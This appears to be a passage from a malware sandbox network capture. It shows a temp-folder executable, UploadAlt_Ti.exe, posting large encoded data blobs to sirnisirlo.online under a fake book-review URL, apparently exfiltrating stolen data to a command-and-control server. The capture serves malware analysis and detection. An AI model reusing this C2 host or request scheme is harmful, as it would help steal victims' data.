2024-11-14 18:57:07 UTC	380	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 95 00 00 00 b4 99 9c 3e 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 81 00 00 00 5a cc 4e 1f 49 60 48 00 00 00 00 00 00 00 00 31 00 00 00 5a cc 4e 1f 28 a5 03 03 16 00 00 00 00 00 00 00 96 00 96 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 a5 03 83 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 28 a5 82 03 00 00 00 00 ff ff ff ff ff ff ff ff ff ff ff ff 00 00 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff 08 00 00 00 8c 00 00 00 94 00 00 00 f3 d4 d1 37 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 01 00 00 00 f9 6a e8 9b c8 48 00 00 00 00 00 00 00 00 31 00 00 00 f9 6a e8 9b 28 a5 03 03 16 Data Ascii: >#eZNI`H1ZN(((7#ejH1j(
2024-11-14 18:57:07 UTC	782	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:07 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Dv6karzN1HGPWNGAyBaswNXHrhl4yQAmTJjAL9nhhLOSjrYkd6y4h8ys7U5NJ08U0uBId8O6LrPSbuqNWFHKfHPziC39IBUqynSXAD%2BNZHP%2Bge3NzoqaaOQNWWY4KPNro5XBJA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e2939b5a929d78d-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=131350&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2842&recv_bytes=1466&delivery_rate=22050&cwnd=32&unsent_bytes=0&cid=24553fa16cb796bc&ts=531&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.7	49258	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:08 UTC	452	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 39217 Host: sirnisirlo.online
2024-11-14 18:57:08 UTC	15331	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 f6 98 00 00 44 e1 fd 17 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 02 00 00 00 22 f0 fe 8b c9 60 00 48 00 00 00 00 00 00 00 00 61 4c 00 00 22 f0 fe 8b 28 a5 81 02 96 00 00 04 04 00 16 8d 46 ac 29 f1 86 6e ff ff ff ff ff ff ff ff 0d 00 0a 00 a3 39 b0 31 31 b2 39 2e 32 b2 b9 2e a0 a8 29 23 a2 2b 29 2a a3 26 17 38 32 33 80 00 08 00 01 02 00 00 00 00 00 00 83 02 00 00 00 00 00 00 80 01 02 fe fd a0 a8 29 23 a2 2b 29 2a a3 26 29 28 27 2b aa a6 a0 a6 24 2a ac a2 2a a2 2b a3 22 a2 27 24 a2 24 2d 22 a0 a8 29 2c 2d a8 a1 22 24 24 26 2a aa 2d a4 a2 25 29 a1 a8 a3 a3 28 29 a8 ab 21 a4 ac ab a0 22 ab 25 a2 2d 2a a0 a2 26 a2 29 a5 2d aa 22 2d 25 24 a9 23 2b a4 aa 28 21 2a 25 2b a3 a5 Data Ascii: D#e"`HaL"(F)n9119.2.)#+)&823)#+)&)('+$*+"'$$-"),-"$$&-%)()!"%-&)-"-%$#+(!%+
2024-11-14 18:57:08 UTC	15331	OUT	Data Raw: a7 a8 23 2c 24 a8 21 26 ab a5 27 24 2c a5 a2 21 26 aa 25 a6 a8 a1 23 a1 a9 2a 21 2b 2c a5 aa aa 28 28 2c 2d 27 a2 ab 21 aa 2d 28 28 2b 25 23 a1 22 26 2c 25 a2 a3 a2 2d a9 a8 a9 24 24 21 27 aa a1 2a 29 a6 a2 22 a6 a3 28 27 2d 21 24 a3 a2 2c 2b 2a ab ab 2d 23 a2 26 a2 23 a8 a8 ab 2c a3 24 a9 2b 22 a6 21 a0 a3 2d a0 27 a9 a7 24 ab a0 a3 24 ab 29 23 a1 2b 27 29 a9 21 a7 a7 2d 23 25 a8 a7 27 a7 ac 28 27 2c 21 a6 24 25 a4 27 a6 a3 a9 a3 26 a6 aa a9 2a a0 a7 a6 2d 2c a5 a7 a4 24 23 ac ac a9 25 ab a2 26 21 29 21 a5 a6 25 aa 2b a8 a5 2b 2b 23 aa 23 26 22 2d a5 25 2b 28 a1 a0 2a 2b a4 24 a1 a4 a9 a0 ac 27 28 2a a6 21 a2 aa a8 ac 25 29 ac 23 aa a9 21 a5 a7 a9 a4 2a 26 2b 22 aa 2a 25 a2 22 a4 25 a0 a8 a1 27 2c a0 25 a2 aa 21 ac ac 2c a1 ab 27 a8 24 a8 25 86 05 28 a5 Data Ascii: #,$!&'$,!&%#!+,((,-'!-((+%#"&,%-$$!')"('-!$,+-#&#,$+"!-'$$)#+')!-#%'(',!$%'&-,$#%&!)!%+++##&"-%+(+$'(!%)#!&+"%"%',%!,'$%(
2024-11-14 18:57:08 UTC	8555	OUT	Data Raw: 26 a1 a1 27 26 a2 a7 a3 a5 26 23 28 2b a9 a3 a6 27 27 a8 2d 24 23 27 a1 ab 27 28 a3 21 a1 26 26 a6 2a ac a5 2d a6 25 a9 aa 22 a4 28 24 a9 aa a8 25 a8 2a a7 2a a4 a1 26 a9 a6 a8 27 24 ac 25 a0 a8 2a 2b 2c a6 a2 2d a0 a2 a3 27 21 a3 a0 22 24 aa 25 27 25 26 a8 2d a9 a9 a3 ab 29 26 ac 21 ab 25 a2 a7 2a a2 29 2c ab 29 2a a4 a1 a4 2b aa 23 27 a5 24 29 aa a9 ab 29 a3 a0 21 ab 28 2d 22 23 2a a3 a9 22 a0 a9 a7 a5 2c a9 23 aa a3 2b 21 aa a4 a9 22 a8 27 25 aa a0 a7 a1 a9 a7 a0 27 2d 23 2c 2a 23 a8 a3 22 a5 a2 a5 a3 2d 25 29 a6 25 a6 a3 2a a0 25 a1 2a 25 a2 a7 a1 2d a1 aa 2d a6 aa ac a5 a0 a5 2d 2d a8 ac 22 29 25 2c ab 2d ab a6 a7 2c a8 a8 26 ab 25 a6 ab a0 a2 27 a4 23 a6 24 25 2c a6 a2 26 a7 2d 2a 2b 24 29 26 a8 2d 27 ab a1 21 2c a5 a2 21 27 aa 21 22 22 a7 23 ac 24 Data Ascii: &'&&#(+''-$#''(!&&-%"($%&'$%+,-'!"$%'%&-)&!%),)+#'$))!(-"#",#+!"'%'-#,#"-%)%%%----")%,-,&%'#$%,&-*+$)&-'!,!'!""#$
2024-11-14 18:57:09 UTC	791	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:09 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NauJSaJplSWsNcX4SyOAHNqwADJ9TTDAJzs%2F04oIc%2BlZ06%2FIUMVhsvu00Aqfp36WbHrPLjj5Ft1URiEtQVxVhGighD2tHAuYjomVk%2FJQ4UD73CrSjf6EA%2FSgMhGMkrGdXbQnsw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e2939bf0b49d787-NRT alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=131174&sent=23&recv=38&lost=0&retrans=0&sent_bytes=2841&recv_bytes=40415&delivery_rate=22070&cwnd=32&unsent_bytes=0&cid=ac5054291dfb30eb&ts=904&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.7	49263	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:10 UTC	453	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 120526 Host: sirnisirlo.online
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 01 08 00 00 00 8c 00 00 00 93 d6 01 00 1f c6 d0 03 1a 23 12 65 c2 05 99 86 00 00 00 00 00 00 00 00 ac 08 00 00 8f 63 68 81 cd 60 53 19 98 1b 1c 1b 9a d4 33 39 b7 37 3a 32 b2 b9 b5 c9 05 00 e6 25 b2 c8 49 e6 82 00 e6 02 00 e7 00 00 00 80 ff 7a 00 00 ec 13 a4 37 3a b2 36 14 29 94 10 a1 b7 39 b2 14 2a a6 94 19 10 a1 28 aa 10 1b 1b 18 18 10 20 10 19 17 1a 18 10 a3 24 3d c8 df a6 b4 b1 39 b7 b9 b7 33 3a 10 21 b0 b9 b4 b1 10 22 b4 b9 38 36 b0 bc 10 a0 32 b0 38 3a b2 39 60 e1 6e 00 da 50 53 a9 bc b9 3a b2 b6 54 29 b2 b3 b4 b9 3a 39 bc 54 b9 b6 b9 b9 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 d5 bb b4 37 b4 37 b4 3a 17 b2 3c b2 d4 b1 b9 39 b9 b9 17 b2 3c b2 56 bb b4 37 36 b7 b3 b7 37 17 b2 3c b2 56 b9 b2 39 3b Data Ascii: #ech`S397:2%Iz7:6)9*( $=93:!"8628:9`nPS:T):9T<9<77:<9<V767<V9;
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: eb 3a 99 0a 32 14 4d f2 95 42 41 83 22 37 e5 17 45 99 e1 48 3e 62 57 61 a8 30 4d 34 5a 06 2e a7 2f 27 27 8c 07 63 09 c5 fb d1 1e b8 4d 4d 3a 79 e9 d8 e0 4d 62 0d 38 05 04 81 1d 42 f2 69 45 47 15 6e f4 78 1c e3 e5 06 91 97 ed 41 ae e2 c9 62 7d f1 7e 1f b7 15 cf 1c 60 d6 12 9a fc a2 ac e1 3d d1 34 52 d1 9b 4e 4a 56 34 33 7b eb ca fd da 25 ca aa a6 88 c4 2d f5 65 0c 09 6d dc 54 30 0e 0f 72 5d 15 bd 95 ec f0 46 27 ba af a0 03 17 25 00 74 24 2c 20 44 44 b4 ff d9 3f 3f c4 80 ec 81 28 59 13 ef 1d 0f 0d 4c 1e 8e 8e 2a 2e dc 56 7a 6d 81 e5 04 4b 6d 92 00 f5 f4 3c f3 cf 30 01 20 83 13 00 31 f4 53 bb 0a a7 7d e8 3a 79 38 18 88 3c bd 11 86 37 5e ef 65 f8 67 05 34 d7 03 fc 1e e1 34 0a 09 c9 d1 e2 c4 4c 43 2e 99 b4 e9 af d1 cc 85 9c fa 46 cd 11 fe 1f c4 87 7a d1 e2 ae Data Ascii: :2MBA"7EH>bWa0M4Z./''cMM:yMb8BiEGnxAb}~`=4RNJV43{%-emT0r]F'%t$, DD??(YL*.VzmKm<0 1S}:y8<7^eg44LC.Fz
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: 29 e7 8f 20 09 2d 3b b7 7d 85 78 e8 88 92 47 c5 28 59 01 e5 ce 69 f4 32 d6 31 76 0e 27 f8 67 20 1a f9 1f 03 f4 a9 33 3b b2 65 10 4d 5f d7 19 71 df 96 bd b5 ba 7e 81 df 51 1e 46 7c 0d d4 4f 5d 34 33 0b f4 3d 51 3e df 5e 61 52 a5 6b 3b 95 93 80 7c 73 fb e4 dd 53 ef 85 f3 df e7 36 96 bf 75 ea a7 56 54 93 91 d3 5f de c2 65 06 95 17 83 24 b8 8f 60 f4 a3 7c 8b 97 99 83 79 f9 a7 0e 93 6f f5 9a 0f 5b 4f bc b9 a3 f3 c7 d5 f3 dd 32 66 6e 57 8a 64 3c ce 92 b3 6f 80 4e f5 53 82 b3 b8 86 d8 d5 a5 4a de d7 18 6b c1 79 f9 f2 a5 a2 b8 7a 8f 26 b4 da 7d 78 8c ef 8f af ee fe b2 fc 10 f9 5f 1c b3 fb 60 28 82 d4 91 f4 89 f7 0f 85 fb d2 ee df dd 91 fc 86 01 33 fd de 1a 6f 9b 76 fa 27 7d 3a 25 77 ef 6b 14 ca f2 04 ff 9e e5 51 bc 9d fc e6 7e 06 fa 8b f7 bb b3 98 85 ca 11 09 3d Data Ascii: ) -;}xG(Yi21v'g 3;eM_q~QF\|O]43=Q>^aRk;\|sS6uVT_e$`\|yo[O2fnWd<oNSJkyz&}x_`(3ov'}:%wkQ~=
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: 3d 0d e6 e9 b8 f2 00 b9 04 e7 91 08 79 37 ac ec 7a a0 43 97 ec 9d 36 cd a3 43 8f 8c db 45 65 55 8d 80 18 7d d0 b1 aa 14 e2 ae 7c c3 00 72 50 32 31 4e 3a a7 34 4f 3f 6d f7 4a 1f 3e 53 53 63 d4 d2 cc 3c 13 7d 1b 5a 15 22 49 66 29 2f a1 3d 54 cf ad 2f 17 d3 4e f7 58 aa 1d 3f 33 cc 6d 7e b5 de 71 e4 50 43 6b 62 3a 25 59 4b 43 03 1e 68 15 18 ba 54 e4 a4 e1 57 56 e4 f4 ea c7 7f 1a 1c 15 e3 16 1a 91 e8 7d 5b 5e 43 7e 26 74 28 3a 9e 42 79 2a 44 7e 95 82 85 54 7d 01 21 84 c7 06 8f 2a 4f e0 e2 6a 1c af 51 10 10 a7 90 48 5b 7f bc 36 bc f2 8e af 15 be 43 e8 12 de 19 d5 af a1 d4 8e 93 8e 39 de 38 7f d4 2c f2 cf 21 0d be a8 f3 99 ac 4d 71 a1 93 f3 88 3c e2 85 f5 49 d0 16 63 54 de 71 44 ef fd 6d 7d a8 b5 c1 6b d1 86 f5 f2 b0 33 0a 8f 51 cf 37 29 84 ae 4e 65 6a cf f4 62 Data Ascii: =y7zC6CEeU}\|rP21N:4O?mJ>SSc<}Z"If)/=T/NX?3m~qPCkb:%YKChTWV}[^C~&t(:ByD~T}!OjQH[6C98,!Mq<IcTqDm}k3Q7)Nejb
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: 04 da a2 df f9 63 2a 2d 79 28 ca b5 56 35 2c ef 8c 5f dc 52 c0 04 33 d7 f3 57 87 78 06 81 1e 36 fa c8 89 05 c1 bf de f2 b2 36 56 1b 91 6a 6d 4e 69 02 c4 cb bd 9a 06 07 c2 0c 1e a2 41 4e 94 32 3f c3 d4 f0 07 5d 92 42 a2 12 31 b4 33 a1 d4 20 7f 0e f7 57 c2 b1 c1 e7 77 8d 1e 54 cf f3 a8 4c bc ac 92 9b 93 1a 5c e6 2d ab 09 24 80 4b d1 ee ff 8d f9 ba 23 72 bb 2b d7 25 a3 b6 3a 40 b0 aa ed 4b ba 65 39 4c a5 6c 33 8f ca bb 48 47 4b de be 47 da 40 51 f6 c9 78 27 90 36 df 96 ac 87 ae a9 1b cf 7d 0e b8 ae 20 5a df af a3 6b d2 bb 8b 80 64 a1 0e 8b 17 ed db 0e 1f 8f 3a 6f 16 c0 5d 75 6a 11 ba 55 c1 85 2a 7e 2c 96 ce fe e1 75 6e 42 fa f9 13 de a8 cf 99 28 44 c4 5d ad ec d7 05 4f 01 f2 2b 96 32 6a af b4 ad 6f 4c a2 cf 13 96 57 3b 0f 0b c8 36 8d f6 49 8c ad 93 3f 58 a0 Data Ascii: c-y(V5,_R3Wx66VjmNiAN2?]B13 WwTL\-$K#r+%:@Ke9Ll3HGKG@Qx'6} Zkd:o]ujU~,unB(D]O+2joLW;6I?X
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: 0e a8 1e ae ca e6 81 72 cf c4 ed 15 ef 83 d2 c3 5e 0f b1 72 ce 2c 52 32 e7 64 29 4a 8b 91 02 2d 6d a5 50 f9 fb 46 55 4c fa 39 83 92 2e 16 17 2b d5 bd 0c 05 6f 83 ab 5e 97 af f3 61 99 70 34 d7 6c ee 9b 32 bf 5d 7a d9 67 35 6c 65 e3 a5 9a 74 4a f3 b1 26 b8 11 6e 7d 33 6b ba aa 9d b9 cc 6b 58 16 d0 16 d3 f0 9f 3c 90 23 6d 2b ae 17 33 17 03 0a 82 b3 c1 8a a3 11 ab e9 20 51 ce ea cc 0b e8 bc f1 f2 85 a5 01 18 56 6d bd 81 60 48 be 9f a9 ee aa f5 b1 a6 1a 74 f3 5f d9 1d ae 42 35 6e 9e 4c 9c 76 90 00 83 3a cc c4 da ec b4 83 a0 ff 0d 72 c7 34 fd 48 60 6a 21 d7 ec eb ac 85 07 b4 96 67 7b 8a ac 85 04 0d be ac f8 5e fd e3 0f 1a a6 45 c5 e5 e5 4a 0e 51 b1 e4 07 ef c3 d8 2e 50 20 16 f4 83 ac eb e8 b3 bc 4a 03 17 ed 65 e8 68 22 dc e6 0f 0f 4b aa 12 4a 33 ad 9c a6 e7 14 Data Ascii: r^r,R2d)J-mPFUL9.+o^ap4l2]zg5letJ&n}3kkX<#m+3 QVm`Ht_B5nLv:r4H`j!g{^EJQ.P Jeh"KJ3
2024-11-14 18:57:10 UTC	15331	OUT	Data Raw: e0 20 3a 32 32 70 06 ef dd 1c 32 71 9f 77 97 24 11 d1 b8 2d 20 03 73 ef 7c d9 e0 04 0c 60 07 55 e7 81 e9 10 c8 1c a6 11 0c 74 25 3a 85 54 a3 b5 2d d2 ff f5 fb 84 81 03 50 e8 b2 e8 72 41 18 49 64 7c 13 06 82 9d 8f 8c 7c 75 ad 57 e4 c3 e6 5e 29 27 94 e5 5b 56 15 e1 a8 30 0d 42 01 05 26 a3 03 eb 29 4b fe cc 04 83 a1 ed 1c 56 19 11 fe 7e 19 7e ca 89 a4 34 d8 28 a6 4a b7 79 00 46 f2 b8 05 43 26 8a fc 50 8e 47 19 da 31 06 31 49 0c 2a 84 c1 e1 b6 8f 79 1b bf d0 a1 b2 7c 95 cc 35 2d b0 e9 a6 f4 10 35 76 62 bb b8 3a 2d 25 2b 30 bc 0c 84 43 02 1a 57 d2 4b 37 19 8e 47 a5 96 d1 91 d1 05 e3 f0 74 24 6c a0 24 1d 99 19 2a 0b a3 3c 51 5e 2e 51 75 40 59 4e 16 45 41 7b 01 a2 a0 26 56 56 51 72 c8 e6 a7 a0 71 cf 2d 63 0a c6 dc 87 c6 17 a5 80 e9 02 31 14 1c e6 32 cd 8d 28 b2 Data Ascii: :22p2qw$- s\|`Ut%:T-PrAId\|\|uW^)'[V0B&)KV~~4(JyFC&PG11Iy\|5-5vb:-%+0CWK7Gt$l$<Q^.Qu@YNEA{&VVQrq-c12(
2024-11-14 18:57:10 UTC	13209	OUT	Data Raw: 28 3c f9 2b ac 0f 6c 78 8b eb a6 67 43 cd 49 ae b3 eb f6 96 6f 1b 46 1d 8e ee f3 26 5a aa 86 75 3f 0d 36 9b c8 36 e4 5c cd 74 3b e0 75 b4 8f fb fe ab 62 4d 93 17 aa ad 87 cd 9e 8c ec 3c e0 5e 9f 6d 7c ed bc ff 21 44 73 8c ff cb fb fc e2 b4 74 a0 1e c8 2f 97 be 7e b0 98 92 25 48 be 95 e2 03 b6 3f cc 12 ce 72 0b 2c a9 7f 65 71 9e 1a 12 50 ed 7f d8 3b ab 1b 20 66 6c a9 24 f3 aa 54 db db bb 34 c5 de 93 1a 72 55 d9 f9 c0 cf 15 8c d5 6e e4 0c ab 2e 52 6e 43 0d 58 51 bd e7 ab 53 21 ec 9a c2 31 f5 bf 31 0f 31 03 7f d2 cd 27 c0 ac fe 0d 9b 7e ca ae 44 dd 0f fe 68 94 74 b0 59 33 d5 0e 17 2d f7 c5 c6 c6 98 66 5f bb 63 90 de 04 7f 36 c9 7f b8 97 a6 cd 5d 7a f5 41 8b 83 19 e9 24 8c 19 96 bd 4f c2 04 de b3 57 ce f7 6b f7 1d 86 04 3c 4c b6 48 14 cf b4 a5 78 38 46 35 4c Data Ascii: (<+lxgCIoF&Zu?66\t;ubM<^m\|!Dst/~%H?r,eqP; fl$T4rUn.RnCXQS!111'~DhtY3-f_c6]zA$OWk<LHx8F5L
2024-11-14 18:57:12 UTC	795	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:11 GMT Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=dy%2FU2IyhVwwm1Rx7evk5spl%2BRub3kj5Elyp2ffiGu6nLlrx%2BJJKiWZ62KV5vkiaj9gVzxO4u7wNjYbBZEnicS96tYyf3lqLvkU8fqFVgbs9%2Fo4jdrGuipm4%2F%2BZ0mB8aXco4bxQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e2939cbcb4067b3-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=38712&sent=63&recv=128&lost=0&retrans=0&sent_bytes=2843&recv_bytes=121945&delivery_rate=74808&cwnd=32&unsent_bytes=0&cid=cb3108e7b7fcf7a5&ts=1345&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.7	49264	188.114.97.3	443	2176	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:12 UTC	449	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 pid: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg Content-Length: 35 Host: sirnisirlo.online
2024-11-14 18:57:12 UTC	35	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 02 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii:
2024-11-14 18:57:13 UTC	707	IN	HTTP/1.1 204 No Content Date: Thu, 14 Nov 2024 18:57:13 GMT Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ogFTsBq8li0XpurjB7EW3Lxk0Dszha3vpejtyMAfu8meG6cB9Tstrhsco3hZCAEciXN%2Bzztv%2FjQd5FJnpjDTufynsUtxKsWnorAOJlgKi90cQTFU14yPApjypzCFYBXbQpZ4Fw%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e2939d6aa40e7b3-DFW alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=1235&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2841&recv_bytes=1120&delivery_rate=2118507&cwnd=251&unsent_bytes=0&cid=086b53ec279e9646&ts=409&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
10	192.168.2.7	49265	188.114.97.3	443	4836	C:\Users\user\AppData\Local\Temp\UploadAlt_Ti.exe

Timestamp	Bytes transferred	Direction	Data
2024-11-14 18:57:44 UTC	372	OUT	POST /book-review-dixie-betrayed-by-david-j.html?wyqg4gfr=cq78MM938kuJ2nKgWAxh4zrEEePhly1R4ngXih4BvoQA6DDU2kPBtfvIlai0MDMPOcRNFRu%2B5SIIxrsXlGAOqg%3D%3D HTTP/1.1 Connection: Keep-Alive Accept: / User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Content-Length: 96 Host: sirnisirlo.online
2024-11-14 18:57:44 UTC	96	OUT	Data Raw: 00 00 00 00 00 00 00 00 03 00 00 00 fd ff ff ff 92 00 00 00 00 00 00 00 00 00 00 2d 00 00 00 fe ff ff ff 97 00 a0 a0 a0 ff ff d9 24 39 65 31 34 36 62 65 39 2d 63 37 36 61 2d 34 37 32 30 2d 62 63 64 62 2d 35 33 30 31 31 62 38 37 62 64 30 36 ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff ff Data Ascii: -$9e146be9-c76a-4720-bcdb-53011b87bd06
2024-11-14 18:57:45 UTC	807	IN	HTTP/1.1 200 OK Date: Thu, 14 Nov 2024 18:57:44 GMT Transfer-Encoding: chunked Connection: close gm: 7dyqhKnmRARBOgJzE12PrKIWC1yisvlEdKSc/NC6SHSNMC3vKFLQ2Wru8KhU2kw03n0Uvg cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=NqSX%2FH%2FvWVKIQf%2FT5sXWhN2UAPeqcQlDlmjXP8sIH27BdGHXV0DhPwC3nicGXQ6EmhXYmtUYOsaxZDjmTVU4d%2B%2FjtVgm3RUzzEb2kDE0earUh340OXOjriCFLQC6S6UspS70Tg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8e293a9bf8ff254e-SJC alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=42126&sent=6&recv=7&lost=0&retrans=0&sent_bytes=2843&recv_bytes=1104&delivery_rate=68723&cwnd=32&unsent_bytes=0&cid=8598e0922759c01c&ts=911&x=0"
2024-11-14 18:57:45 UTC	17	IN	Data Raw: 63 0d 0a 00 00 00 00 00 00 00 00 6a 7a 00 00 0d 0a Data Ascii: cjz
2024-11-14 18:57:45 UTC	1369	IN	Data Raw: 33 37 63 61 0d 0a c8 dd 6d 32 14 00 4c 0a 60 03 01 00 19 1d 0e 1f 19 41 08 a2 bf bf 60 03 8a 08 23 72 9c 5a 99 86 00 10 00 0c 09 98 01 04 00 19 1d 0e 1f 19 41 04 a1 c4 c4 98 01 48 95 ae c0 e7 42 da ce 14 00 6b 0b 59 02 0c 00 19 1d 0e 1f 19 41 08 cb bf bf 59 02 8a 08 23 72 9c 5a 99 86 15 17 b9 b8 36 b4 3a b2 96 bb b0 36 10 00 b5 08 79 0f 04 00 19 1d 0e 1f 19 41 04 ec c4 c4 79 0f 8b c5 a3 15 78 1e a8 39 14 00 be 08 f8 08 0a 00 19 1d 0e 1f 19 41 08 08 bf bf f8 08 8a 08 23 72 9c 5a 99 86 26 b7 b3 b4 37 10 22 b0 3a b0 10 00 cf 07 4f 07 04 00 19 1d 0e 1f 19 41 04 08 c4 c4 4f 07 25 87 27 47 82 9f 2c 6b 10 00 24 0f 5d 00 04 00 19 1d 0e 1f 19 41 04 cb c4 c4 5d 00 5b cb 8f 2d fd d3 84 01 14 00 59 04 e9 07 05 00 19 1d 0e 1f 19 41 08 cb bf bf e9 07 8a 08 23 72 9c 5a Data Ascii: 37cam2L`A`#rZAHBkYAY#rZ6:6yAyx9A#rZ&7":OAO%'G,k$]A][-YA#rZ
